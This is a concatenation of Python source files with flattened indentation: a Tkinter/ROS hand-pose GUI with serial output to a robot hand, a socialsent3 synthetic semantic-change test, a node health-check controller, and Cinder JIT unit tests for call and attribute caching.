if tb1.get() == tb_defalt:
print("Please input file name.")
else:
file_name = tb1.get()
np.savez(file_name + ".npz", x=np.array(Posenames), y=np.array(finger_state))
sim.Save(file_name)
tb1_clear()
tb2_print("Complete")
def load_param():
global file_name, Posenames, finger_state
if tb1.get() == tb_defalt:
print("Please input file name.")
else:
file_name = tb1.get()
zp = np.load(file_name+".npz")
Posenames = zp["x"].tolist()
finger_state = zp["y"].tolist()
# print(finger_state)
sim.Load(file_name)
cb['values'] = Posenames
lb_update()
tb1_clear()
tb2_print("Loaded")
def serialWrite(farray):
a = []
for i in farray:
a.append(int(i))
# print(a)
buf = [0xfe, 0xef, len(farray)] + a
# [ser.write(i.to_bytes(1, byteorder='little')) for i in buf]
if connected:
ser.flushInput()
ser.flushOutput()
[ser.write(chr(i)) for i in buf]
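# Hedged illustration (editor addition): serialWrite(["1", "1", "0", "1", "1", "1"])
# writes the frame [0xfe, 0xef, 6, 1, 1, 0, 1, 1, 1] to the serial port, i.e. a
# two-byte header, a length byte, then one byte per finger state.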
def sum_str(str_arr):
string = ""
for i in str_arr:
string += i
return string
# ----------------------------------- Variables ----------------------------------- #
sub = Subscribers()
sim = Similarity.Similarity()
Posenames = []
finger_state = []
root = Tk()
Min = 0.95
tb_defalt = "new pose name or filename to load and save"
th1 = th.Thread(target=find_proc)
st_flg = False
file_path = "/home/fumyia/"
portname = "/dev/ttyACM1"
baudrate = 115200
connected = False
try:
ser = serial.Serial(portname, baudrate)
connected = True
print("Mbed is connected")
except serial.serialutil.SerialException:
connected = False
explanations = []
explanations.append("1. ポーズの登録\n・TextBoxに登録したいポーズの名前を入力\n・Addボタンを押し、手を登録したいポーズにする\n・テキストボックスに結果が表示されれば登録完了。ComboBoxに登録したポーズが追加される\n\n")
explanations.append("2. ポーズの削除\n・現状、Editボタンが機能しないため、教師データを変更したい場合は削除する必要がある\n・ComboBoxから削除したいポーズを選択する\n・Deleteボタンを押し、削除する\n\n")
explanations.append("3. ロボットハンドの状態\n・ComboBoxから設定したいポーズの名前を選択する\n・親指の回内外, 親指の屈曲, 人差し指の屈曲, 中指の屈曲, 薬指の屈曲, 小指の屈曲\n・上の順に曲げるなら1, そうでない場合は0を入力する\n・例)1, 1, 1, 0, 1, 1 \n\n")
explanations.append("4. ポーズ判定の実行\n・Find/Stopボタンを押すとポーズ判別が開始する\n・判定を終了したい場合は同様にFind/Stopボタンを押す\n\n")
explanations.append("5. セーブとロード\n・テキストボックスにセーブ(ロード)したいファイル名を入力し、Save(Load)ボタンを押す\n\n")
explanation = sum_str(explanations)
# ------------------------------------ Widgets ------------------------------------ #
root.title("Pose Estimation")
#root.geometry("400x300")
button1 = Button(root, text="Add", command=button1_click, height=2, width=5) # button2
button2 = Button(root, text="Delete", command=button2_click, height=2, width=5) # button3
button3 = Button(root, text="Find/Stop", command=button3_click, height=2, width=5)
button4 = Button(root, text="Edit", command=button4_click, height=2, width=5)
button5 = Button(root, text="Save", command=save_param, height=2, width=5)
button6 = Button(root, text="Load", command=load_param, height=2, width=5)
# button6 = Button(root, text="", command=, height=2, width=5)
cb = ttk.Combobox(root)
label_th = Label(root, text="Threshold[%]")
label_n = Label(root, text="Measurement number")
label_ex = Label(root, text=explanation, anchor="w", justify="left", width=60)
tb1 = Entry(root)
tb2 = Text(root, width=24, height=10.5)
lb = Listbox(root)
s1 = Scale(root, orient='h', from_=0, to=100, command=change_threshold, length=200)
s2 = Scale(root, orient='h', from_=20, to=50, command=change_measurement_n, length=200)
# ----------------------------------- main ----------------------------------------- #
if __name__ == "__main__":
# Arrangement
button1.grid(row=0, column=0, padx=5, pady=5)
button2.grid(row=0, column=1, padx=5, pady=5)
button3.grid(row=1, column=0, padx=5, pady=5)
button4.grid(row=1, column=1, padx=5, pady=5)
button5.grid(row=2, column=0, padx=5, pady=5)
button6.grid(row=2, column=1, padx=5, pady=5)
cb.grid(row=3, column=0, padx=5, pady=5, columnspan=5)
tb1.grid(row=4, column=0, padx=5, pady=5, columnspan=5)
lb.grid(row=5, column=0)
tb2.grid(row=5, column=1)
label_th.grid(row=6, columnspan=8, ipadx=0)
s1.grid(row=7, columnspan=8, ipadx=0)
label_n.grid(row=8, columnspan=8, ipadx=0)
s2.grid(row=9, columnspan=8, ipadx=0)
label_ex.grid(row=10, columnspan=8, ipadx=0)
s1.set(Min * 100)
s2.set(50)
# initialize
tb1.insert(Tkinter.END, tb_defalt)
rospy.init_node("gui")
cb['values'] = Posenames
th1.start()
# main process
root.mainloop()
rospy.spin()
|
synthetic_test.py
|
from socialsent3 import constants
from socialsent3 import util
from socialsent3 import polarity_induction_methods
import time
from socialsent3 import seeds
from socialsent3.historical import vocab
import random
import numpy as np
from socialsent3 import evaluate_methods
from multiprocessing.queues import Empty
from multiprocessing import Process, Queue
from socialsent3.representations.representation_factory import create_representation
from socialsent3.representations.embedding import Embedding
from numpy import vstack
from scipy.stats import logistic
from scipy.sparse import csr_matrix
SYNTH_FREQ = 5 * 10 ** -5.0
# NEW_POS = ["cheerful", "beautiful", "charming", "pleasant", "sweet", "favourable", "cheery"]
NEW_POS = ["cheerful", "beautiful", "charming", "merry", "pleasing"]
NEW_NEG = ["hideous", "terrible", "dreadful", "worst", "awful"]
# NEW_NEG = ["disgusting", "hideous", "terrible", "unhappy", "nasty", "repulsive", "offensive"]
OLD_POS = NEW_POS
OLD_NEG = NEW_NEG
YEARS = range(1850, 1991, 10)
"""
Runs synthetic test of amelioration and pejoration.
"""
def worker(proc_num, queue, iter):
while True:
time.sleep(random.random() * 10)
try:
year = queue.get(block=False)
except Empty:
print(proc_num, "Finished")
return
np.random.seed()
positive_seeds, negative_seeds = seeds.hist_seeds()
year = str(year)
print(proc_num, "On year", year)
words = vocab.pos_words(year, "ADJ")
embed = create_representation("SVD", constants.COHA_EMBEDDINGS + year)
print(year, len(words))
embed_words = set(embed.iw)
words = words.intersection(embed_words)
print(year, len(words))
# counts = create_representation("Explicit", constants.COHA_COUNTS + year, normalize=False)
# ppmi = create_representation("Explicit", constants.COHA_PPMI + year)
weight = _make_weight(float(year))
print(year, weight)
embed = embed.get_subembed(words)
test_embed = make_synthetic_data(embed, embed, words, weight, seed_offset=iter)
polarities = evaluate_methods.run_method(positive_seeds, negative_seeds,
test_embed,
method=polarity_induction_methods.random_walk,
beta=0.9, nn=25,
**evaluate_methods.DEFAULT_ARGUMENTS)
util.write_pickle(polarities, constants.POLARITIES + year + '-synth-adj-coha-' + str(iter) + '.pkl')
def _make_weight(year):
scaled = 2 * (year - YEARS[0]) / (YEARS[-1] - YEARS[0]) - 1
scaled *= -4
return logistic.cdf(scaled)
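# Hedged illustration (editor addition): _make_weight maps YEARS linearly onto
# [-1, 1], scales by -4, and squashes through the logistic CDF, so the synthetic
# positive weight decays from roughly 0.98 in 1850 to roughly 0.02 in 1990 and
# crosses 0.5 at the midpoint of the range.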
def make_synthetic_data(ppmi, counts, word_subset, new_weight, num_synth=10,
old_pos=OLD_POS, new_pos=NEW_POS, old_neg=OLD_NEG, new_neg=NEW_NEG, dim=300, seed_offset=0):
# print new_weight
# ppmi = ppmi.get_subembed(word_subset, restrict_context=False)
amel_vecs = []
print("Sampling positive...")
for i in range(num_synth):
amel_vecs.append(_sample_vec2(new_pos, old_neg, counts, new_weight, seed=i + seed_offset))
amel_mat = vstack(amel_vecs)
pejor_vecs = []
print("Sampling negative...")
for i in range(num_synth):
pejor_vecs.append(_sample_vec2(old_pos, new_neg, counts, 1 - new_weight, seed=i + num_synth + seed_offset))
pejor_mat = vstack(pejor_vecs)
print("Making matrix...")
# ppmi_mat = vstack([ppmi.m, amel_mat, pejor_mat])
u = vstack([counts.m, amel_mat, pejor_mat])
print("SVD on matrix...")
# u, s, v = randomized_svd(ppmi_mat, n_components=dim, n_iter=2)
new_vocab = ppmi.iw
new_vocab.extend(['a-{0:d}'.format(i) for i in range(num_synth)])
new_vocab.extend(['p-{0:d}'.format(i) for i in range(num_synth)])
return Embedding(u, new_vocab)
def _sample_vec2(pos_words, neg_words, counts, pos_weight, seed=1):
vec = np.zeros((counts.m.shape[1],))
np.random.seed(seed)
pos_weights = np.random.dirichlet(np.repeat([0.1], len(pos_words)))
pos_weights = pos_weights / np.sum(pos_weights)
print(pos_weights)
for i, word in enumerate(pos_words):
sample_vec = pos_weights[i] * pos_weight * counts.represent(word)
vec += sample_vec
neg_weights = np.random.dirichlet(np.repeat([0.1], len(neg_words)))
neg_weights = neg_weights / np.sum(neg_weights)
for i, word in enumerate(neg_words):
sample_vec = neg_weights[i] * (1 - pos_weight) * counts.represent(word)
vec += sample_vec
return vec / np.linalg.norm(vec)
def _sample_vec(pos_words, neg_words, counts, pos_weight, seed):
sample_size = counts.m.sum() * SYNTH_FREQ / len(neg_words)
vec = np.zeros((counts.m.shape[1],))
np.random.seed(seed)
pos_weights = np.random.uniform(size=len(pos_words))
pos_weights = pos_weights / np.sum(pos_weights)
print(pos_weights)
for i, word in enumerate(pos_words):
sample_vec = counts.represent(word)
sample_vec /= float(sample_vec.sum())
sample_vec = pos_weights[i] * pos_weight * np.random.multinomial(sample_size, sample_vec.todense().A[0])
sample_vec = np.clip(sample_vec, 0, sample_size)
if not np.isfinite(sample_vec.sum()):
print("Infinite sample with", word)
continue
vec += sample_vec
neg_weights = np.random.uniform(size=len(neg_words))
neg_weights = neg_weights / np.sum(neg_weights)
for i, word in enumerate(neg_words):
sample_vec = counts.represent(word)
sample_vec /= float(sample_vec.sum())
sample_vec = neg_weights[i] * (1 - pos_weight) * np.random.multinomial(sample_size, sample_vec.todense().A[0])
sample_vec = np.clip(sample_vec, 0, sample_size)
if not np.isfinite(sample_vec.sum()):
print("Infinite sample with", word)
continue
vec += sample_vec
vec = csr_matrix(vec)
new_mat = vstack([counts.m, vec])
new_mat = new_mat / new_mat.sum()
synth_prob = new_mat[-1, :].sum()
for neigh in vec.nonzero()[1]:
val = max(np.log(new_mat[-1, neigh]
/ (synth_prob * new_mat[neigh, :].sum() ** 0.75)),
0)
if np.isfinite(val):
vec[0, neigh] = val
return vec / np.sqrt((vec.multiply(vec).sum()))
def main(iterable):
num_procs = 20
queue = Queue()
for year in YEARS:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, iterable]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == "__main__":
for _iterable in range(0, 50):
main(_iterable)
|
__init__.py
|
from .authenticity import AuthenticityCheckLoopController
from .healthcheck import HealthCheckLoopController
from .abstract import AbstractLoopController
from ..entity.host import Node
from time import sleep
import threading
import tornado.log
import traceback
import sys
class ShellController:
threads = [] # type: list[threading.Thread]
nodes = {} # type: dict[Node]
sleep_time = 30 # type: int
controllers = []  # type: list[AbstractLoopController]
def __init__(self, nodes: dict, sleep_time: int, validators: dict):
self.nodes = nodes
self.sleep_time = sleep_time
self.controllers = [
AuthenticityCheckLoopController({}, validators['HostAuthenticity']),
HealthCheckLoopController({}, validators['Health'])
]
def start(self):
for node_name, node in self.nodes.items():
self._spawn_thread_for_node(node)
sleep(1)
def _spawn_thread_for_node(self, node: Node):
self._create_thread(self._create_worker_loop, [node])
def _create_worker_loop(self, node: Node):
while True:
for controller in self.controllers:
try:
controller.perform_check(node)
except Exception as e:
tornado.log.app_log.warning(
'Audit check was interrupted for node ' + str(node) + ' because of an error'
)
tornado.log.app_log.error('[' + str(node) + '] ' + str(e))
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, limit=10, file=sys.stdout)
sleep(self.sleep_time)
def _create_thread(self, target, args):
healthcheck_thread = threading.Thread(target=target, args=args)
healthcheck_thread.daemon = True
healthcheck_thread.start()
self.threads.append(healthcheck_thread)
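# Hedged usage sketch (editor addition): the controller expects one Node per entry
# in `nodes` and a validator registry keyed by 'HostAuthenticity' and 'Health'; the
# names below are hypothetical.
#
#     controller = ShellController(nodes={'web-1': node}, sleep_time=30,
#                                  validators={'HostAuthenticity': auth_validator,
#                                              'Health': health_validator})
#     controller.start()  # spawns one daemon worker loop per node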
|
test_cinderjit.py
|
# Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
import _testcapi
import asyncio
import builtins
import dis
import gc
import sys
import threading
import types
import unittest
import warnings
import weakref
from compiler.static import StaticCodeGenerator
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from .test_compiler.test_static import StaticTestBase
except ImportError:
from test_compiler.test_static import StaticTestBase
from contextlib import contextmanager
try:
import cinderjit
except:
cinderjit = None
# Decorator to return a new version of the function with an alternate globals
# dict.
def with_globals(gbls):
def decorator(func):
new_func = type(func)(
func.__code__, gbls, func.__name__, func.__defaults__, func.__closure__
)
new_func.__module__ = func.__module__
new_func.__kwdefaults__ = func.__kwdefaults__
return new_func
return decorator
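# Hedged illustration (editor addition): the decorator rebuilds the function object
# against a substituted globals dict, so global lookups resolve there.
#
#     @with_globals({"x": 1})
#     def read_x():
#         return x
#
#     read_x()  # -> 1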
@unittest.failUnlessJITCompiled
def get_meaning_of_life(obj):
return obj.meaning_of_life()
def nothing():
return 0
def _simpleFunc(a, b):
return a, b
class _CallableObj:
def __call__(self, a, b):
return self, a, b
class CallKWArgsTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_basic_function_pos_and_kw(self):
r = _simpleFunc(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_basic_function_kw_only(self):
r = _simpleFunc(b=2, a=1)
self.assertEqual(r, (1, 2))
r = _simpleFunc(a=1, b=2)
self.assertEqual(r, (1, 2))
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
r = CallKWArgsTests._f1(1, b=2)
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(b=2, a=1)
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(1, b=2)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(b=2, a=1)
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(1, b=2)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(b=2, a=1)
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func(self):
self.assertEqual(__import__("sys", globals=None), sys)
class CallExTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_dict(self):
r = _simpleFunc(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
class _DummyMapping:
def keys(self):
return ("a", "b")
def __getitem__(self, k):
return {"a": 1, "b": 2}[k]
@unittest.failUnlessJITCompiled
def test_call_dynamic_kw_mapping(self):
r = _simpleFunc(**CallExTests._DummyMapping())
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_tuple(self):
r = _simpleFunc(*(1, 2))
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_list(self):
r = _simpleFunc(*[1, 2])
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_dynamic_pos_and_kw(self):
r = _simpleFunc(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def _doCall(self, args, kwargs):
return _simpleFunc(*args, **kwargs)
def test_invalid_kw_type(self):
err = r"_simpleFunc\(\) argument after \*\* must be a mapping, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall([], 1)
@unittest.skipUnlessCinderJITEnabled("Exposes interpreter reference leak")
def test_invalid_pos_type(self):
err = r"_simpleFunc\(\) argument after \* must be an iterable, not int"
with self.assertRaisesRegex(TypeError, err):
self._doCall(1, {})
@staticmethod
def _f1(a, b):
return a, b
@unittest.failUnlessJITCompiled
def test_call_class_static_pos_and_kw(self):
r = CallExTests._f1(*(1,), **{"b": 2})
self.assertEqual(r, (1, 2))
@unittest.failUnlessJITCompiled
def test_call_class_static_kw_only(self):
r = CallKWArgsTests._f1(**{"b": 2, "a": 1})
self.assertEqual(r, (1, 2))
def _f2(self, a, b):
return self, a, b
@unittest.failUnlessJITCompiled
def test_call_method_kw_and_pos(self):
r = self._f2(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_method_kw_only(self):
r = self._f2(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_and_pos(self):
f = self._f2
r = f(*(1,), **{"b": 2})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_bound_method_kw_only(self):
f = self._f2
r = f(**{"b": 2, "a": 1})
self.assertEqual(r, (self, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_and_pos(self):
o = _CallableObj()
r = o(*(1,), **{"b": 2})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_obj_kw_only(self):
o = _CallableObj()
r = o(**{"b": 2, "a": 1})
self.assertEqual(r, (o, 1, 2))
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_only(self):
self.assertEqual(len(*([2],)), 1)
@unittest.failUnlessJITCompiled
def test_call_c_func_pos_and_kw(self):
self.assertEqual(__import__(*("sys",), **{"globals": None}), sys)
class LoadMethodCacheTests(unittest.TestCase):
def test_type_modified(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Invalidate cache
def new_meaning_of_life(x):
return 0
Oracle.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_base_type_modified(self):
class Base:
def meaning_of_life(self):
return 42
class Derived(Base):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate Base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_second_base_type_modified(self):
class Base1:
pass
class Base2:
def meaning_of_life(self):
return 42
class Derived(Base1, Base2):
pass
obj = Derived()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
# Mutate first base. Should propagate to Derived and invalidate the cache.
def new_meaning_of_life(x):
return 0
Base1.meaning_of_life = new_meaning_of_life
self.assertEqual(get_meaning_of_life(obj), 0)
def test_type_dunder_bases_reassigned(self):
class Base1:
pass
class Derived(Base1):
pass
# No shadowing happens between obj{1,2} and Derived, thus the
# no-shadowing flag should be set
obj1 = Derived()
obj2 = Derived()
obj2.meaning_of_life = nothing
# Now obj2.meaning_of_life shadows Base2.meaning_of_life (defined below)
class Base2:
def meaning_of_life(self):
return 42
Derived.__bases__ = (Base2,)
# Attempt to prime the cache
self.assertEqual(get_meaning_of_life(obj1), 42)
self.assertEqual(get_meaning_of_life(obj1), 42)
# If flag is not correctly cleared when Derived.__bases__ is
# assigned we will end up returning 42
self.assertEqual(get_meaning_of_life(obj2), 0)
def _make_obj(self):
class Oracle:
def meaning_of_life(self):
return 42
obj = Oracle()
# Uncached
self.assertEqual(get_meaning_of_life(obj), 42)
# Cached
self.assertEqual(get_meaning_of_life(obj), 42)
return obj
def test_instance_assignment(self):
obj = self._make_obj()
obj.meaning_of_life = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_assignment(self):
obj = self._make_obj()
obj.__dict__["meaning_of_life"] = nothing
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dict_replacement(self):
obj = self._make_obj()
obj.__dict__ = {"meaning_of_life": nothing}
self.assertEqual(get_meaning_of_life(obj), 0)
def test_instance_dunder_class_assignment(self):
obj = self._make_obj()
class Other:
pass
other = Other()
other.meaning_of_life = nothing
other.__class__ = obj.__class__
self.assertEqual(get_meaning_of_life(other), 0)
def test_shadowcode_setattr(self):
"""sets attribute via shadow byte code, it should update the
type bit for instance shadowing"""
obj = self._make_obj()
obj.foo = 42
obj1 = type(obj)()
obj1.other = 100
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
def test_shadowcode_setattr_split(self):
"""sets attribute via shadow byte code on a split dict,
it should update the type bit for instance shadowing"""
obj = self._make_obj()
def f(obj, set):
if set:
obj.meaning_of_life = nothing
yield 42
for i in range(100):
list(f(obj, False))
list(f(obj, True))
self.assertEqual(get_meaning_of_life(obj), 0)
@unittest.failUnlessJITCompiled
def get_foo(obj):
return obj.foo
class LoadAttrCacheTests(unittest.TestCase):
def test_dict_reassigned(self):
class Base:
def __init__(self, x):
self.foo = x
obj1 = Base(100)
obj2 = Base(200)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
obj1.__dict__ = {"foo": 200}
self.assertEqual(get_foo(obj1), 200)
self.assertEqual(get_foo(obj2), 200)
def test_dict_mutated(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj = Base(100)
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.__dict__["foo"] = 200
self.assertEqual(get_foo(obj), 200)
def test_dict_resplit(self):
# This causes one resize of the instance dictionary, which should cause
# it to go from split -> combined -> split.
class Base:
def __init__(self):
self.foo, self.a, self.b = 100, 200, 300
self.c, self.d, self.e = 400, 500, 600
obj = Base()
# uncached
self.assertEqual(get_foo(obj), 100)
# cached
self.assertEqual(get_foo(obj), 100)
obj.foo = 800
self.assertEqual(get_foo(obj), 800)
def test_dict_combined(self):
class Base:
def __init__(self, foo):
self.foo = foo
obj1 = Base(100)
# uncached
self.assertEqual(get_foo(obj1), 100)
# cached
self.assertEqual(get_foo(obj1), 100)
obj2 = Base(200)
obj2.bar = 300
# At this point the dictionary should still be split
obj3 = Base(400)
obj3.baz = 500
# Assigning 'baz' should clear the cached key object for Base and leave
# existing instance dicts in the following states:
#
# obj1.__dict__ - Split
# obj2.__dict__ - Split
# obj3.__dict__ - Combined
obj4 = Base(600)
self.assertEqual(get_foo(obj1), 100)
self.assertEqual(get_foo(obj2), 200)
self.assertEqual(get_foo(obj3), 400)
self.assertEqual(get_foo(obj4), 600)
@unittest.failUnlessJITCompiled
def set_foo(x, val):
x.foo = val
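# Data descriptor used by StoreAttrCacheTests: __set__ records that it was invoked
# instead of writing to the instance __dict__.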
class DataDescr:
def __init__(self, val):
self.val = val
self.invoked = False
def __get__(self, obj, typ):
return self.val
def __set__(self, obj, val):
self.invoked = True
class StoreAttrCacheTests(unittest.TestCase):
def test_data_descr_attached(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# Attaching a data descriptor to the type should invalidate the cache
# and prevent future caching
descr = DataDescr(300)
Base.foo = descr
set_foo(obj, 200)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
descr.invoked = False
set_foo(obj, 400)
self.assertEqual(obj.foo, 300)
self.assertTrue(descr.invoked)
def test_swap_split_dict_with_combined(self):
class Base:
def __init__(self, x):
self.foo = x
obj = Base(100)
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# At this point obj should have a split dictionary for attribute
# storage. We're going to swap it out with a combined dictionary
# and verify that attribute stores still work as expected.
d = {"foo": 300}
obj.__dict__ = d
set_foo(obj, 400)
self.assertEqual(obj.foo, 400)
self.assertEqual(d["foo"], 400)
def test_swap_combined_dict_with_split(self):
class Base:
def __init__(self, x):
self.foo = x
# Swap out obj's dict with a combined dictionary. Priming the IC
# for set_foo will result in it expecting a combined dictionary
# for instances of type Base.
obj = Base(100)
obj.__dict__ = {"foo": 100}
# Uncached
set_foo(obj, 200)
# Cached
set_foo(obj, 200)
self.assertEqual(obj.foo, 200)
# obj2 should have a split dictionary used for attribute storage
# which will result in a cache miss in the IC
obj2 = Base(300)
set_foo(obj2, 400)
self.assertEqual(obj2.foo, 400)
def test_split_dict_no_slot(self):
class Base:
pass
# obj is a split dict
obj = Base()
obj.quox = 42
# obj1 is no longer split, but the assignment
# didn't go through _PyObjectDict_SetItem, so the type
# still has a valid CACHED_KEYS
obj1 = Base()
obj1.__dict__["other"] = 100
# now we try setting foo on obj1, do the set on obj1
# while setting up the cache, but attempt to create a cache
# with an invalid val_offset because there's no foo
# entry in the cached keys.
set_foo(obj1, 300)
self.assertEqual(obj1.foo, 300)
set_foo(obj, 400)
self.assertEqual(obj1.foo, 300)
class LoadGlobalCacheTests(unittest.TestCase):
def setUp(self):
global license, a_global
try:
del license
except NameError:
pass
try:
del a_global
except NameError:
pass
@staticmethod
def set_global(value):
global a_global
a_global = value
@staticmethod
@unittest.failUnlessJITCompiled
def get_global():
return a_global
@staticmethod
def del_global():
global a_global
del a_global
@staticmethod
def set_license(value):
global license
license = value
@staticmethod
def del_license():
global license
del license
@unittest.failUnlessJITCompiled
def test_simple(self):
global a_global
self.set_global(123)
self.assertEqual(a_global, 123)
self.set_global(456)
self.assertEqual(a_global, 456)
@unittest.failUnlessJITCompiled
def test_shadow_builtin(self):
self.assertIs(license, builtins.license)
self.set_license(0xDEADBEEF)
self.assertIs(license, 0xDEADBEEF)
self.del_license()
self.assertIs(license, builtins.license)
@unittest.failUnlessJITCompiled
def test_shadow_fake_builtin(self):
self.assertRaises(NameError, self.get_global)
builtins.a_global = "poke"
self.assertEqual(a_global, "poke")
self.set_global("override poke")
self.assertEqual(a_global, "override poke")
self.del_global()
self.assertEqual(a_global, "poke")
# We don't support DELETE_ATTR yet.
delattr(builtins, "a_global")
self.assertRaises(NameError, self.get_global)
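    # A str subclass whose hash/equality include a hidden prefix, so an instance can
    # sit in globals() under a key that compares equal to "a_global" without being
    # that exact string.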
class prefix_str(str):
def __new__(ty, prefix, value):
s = super().__new__(ty, value)
s.prefix = prefix
return s
def __hash__(self):
return hash(self.prefix + self)
def __eq__(self, other):
return (self.prefix + self) == other
@unittest.failUnlessJITCompiled
def test_weird_key_in_globals(self):
global a_global
self.assertRaises(NameError, self.get_global)
globals()[self.prefix_str("a_glo", "bal")] = "a value"
self.assertEqual(a_global, "a value")
self.assertEqual(self.get_global(), "a value")
class MyGlobals(dict):
def __getitem__(self, key):
if key == "knock_knock":
return "who's there?"
return super().__getitem__(key)
@with_globals(MyGlobals())
def return_knock_knock(self):
return knock_knock
def test_dict_subclass_globals(self):
self.assertEqual(self.return_knock_knock(), "who's there?")
@unittest.failUnlessJITCompiled
def _test_unwatch_builtins(self):
self.set_global("hey")
self.assertEqual(self.get_global(), "hey")
builtins.__dict__[42] = 42
def test_unwatch_builtins(self):
try:
self._test_unwatch_builtins()
finally:
del builtins.__dict__[42]
class ClosureTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_cellvar(self):
a = 1
def foo():
return a
self.assertEqual(foo(), 1)
@unittest.failUnlessJITCompiled
def test_two_cellvars(self):
a = 1
b = 2
def g():
return a + b
self.assertEqual(g(), 3)
@unittest.failUnlessJITCompiled
def test_cellvar_argument(self):
def foo():
self.assertEqual(1, 1)
foo()
@unittest.failUnlessJITCompiled
def test_cellvar_argument_modified(self):
self_ = self
def foo():
nonlocal self
self = 1
self_.assertIs(self, self_)
foo()
self_.assertEqual(self, 1)
@unittest.failUnlessJITCompiled
def _cellvar_unbound(self):
b = a
a = 1
def g():
return a
def test_cellvar_unbound(self):
with self.assertRaises(UnboundLocalError) as ctx:
self._cellvar_unbound()
self.assertEqual(
str(ctx.exception), "local variable 'a' referenced before assignment"
)
def test_freevars(self):
x = 1
@unittest.failUnlessJITCompiled
def nested():
return x
x = 2
self.assertEqual(nested(), 2)
def test_freevars_multiple_closures(self):
def get_func(a):
@unittest.failUnlessJITCompiled
def f():
return a
return f
f1 = get_func(1)
f2 = get_func(2)
self.assertEqual(f1(), 1)
self.assertEqual(f2(), 2)
def test_nested_func(self):
@unittest.failUnlessJITCompiled
def add(a, b):
return a + b
self.assertEqual(add(1, 2), 3)
self.assertEqual(add("eh", "bee"), "ehbee")
@staticmethod
def make_adder(a):
@unittest.failUnlessJITCompiled
def add(b):
return a + b
return add
def test_nested_func_with_closure(self):
add_3 = self.make_adder(3)
add_7 = self.make_adder(7)
self.assertEqual(add_3(10), 13)
self.assertEqual(add_7(12), 19)
self.assertEqual(add_3(add_7(-100)), -90)
with self.assertRaises(TypeError):
add_3("ok")
def test_nested_func_with_different_globals(self):
@unittest.failUnlessJITCompiled
@with_globals({"A_GLOBAL_CONSTANT": 0xDEADBEEF})
def return_global():
return A_GLOBAL_CONSTANT
self.assertEqual(return_global(), 0xDEADBEEF)
return_other_global = with_globals({"A_GLOBAL_CONSTANT": 0xFACEB00C})(
return_global
)
self.assertEqual(return_other_global(), 0xFACEB00C)
self.assertEqual(return_global(), 0xDEADBEEF)
self.assertEqual(return_other_global(), 0xFACEB00C)
